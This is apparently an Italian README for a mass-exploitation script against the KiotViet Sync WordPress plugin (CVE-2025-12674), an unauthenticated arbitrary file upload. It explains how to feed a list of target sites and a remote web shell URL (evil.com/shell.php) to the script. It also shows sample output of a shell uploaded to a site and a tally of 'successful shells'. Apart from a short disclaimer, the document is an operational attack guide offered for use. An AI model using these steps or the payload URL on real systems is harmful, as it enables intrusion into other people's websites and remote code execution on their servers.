
KiotViet Sync <= 1.8.5 - Caricamento File Arbitrario Non Autenticato
KiotViet Sync <= 1.8.5 - Caricamento Arbitrario di File Non Autenticato
Il plugin KiotViet Sync per WordPress (versioni fino a 1.8.5 incluse) è vulnerabile al caricamento arbitrario di file, a causa della mancata validazione del tipo di file nella funzione create_media().
Questa vulnerabilità consente a attaccanti non autenticati di caricare file arbitrari sul server, il che può portare a esecuzione di codice remoto.
Clona questo repository o scarica lo script.
Prepara i tuoi target:
Metti un target per riga in un file chiamato list.txt.
example.com
site2.com
http://site3.com
Esegui lo script di exploit:
Il nome dello script è:
CVE-2025-12674.py
python3 CVE-2025-12674.py
Quando richiesto, inserisci le tue opzioni:
Enter targets file name (default: list.txt): list.txt
Enter number of threads (default: 10):
Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Loaded 1 targets. Threads: 10. │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ http://nxk.ddev.site │
│ Trying KiotViet exploit... │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ ✔ Shell uploaded! ║
║ Check here: ║
║ http://nxk.ddev.site/wp-content/uploads/2026/01/ ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
Summary
Metric Value
───────────────────────────
Total attempts 1
Successful shells 1
Failed attempts 0
shells.txt.Questo script è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.
L'uso non autorizzato contro sistemi di cui non si possiede o non si ha il permesso esplicito di testare è illegale e non etico.
L'autore non si assume alcuna responsabilità per uso improprio o per eventuali danni causati.
Nxploited (Khaled Alenazi)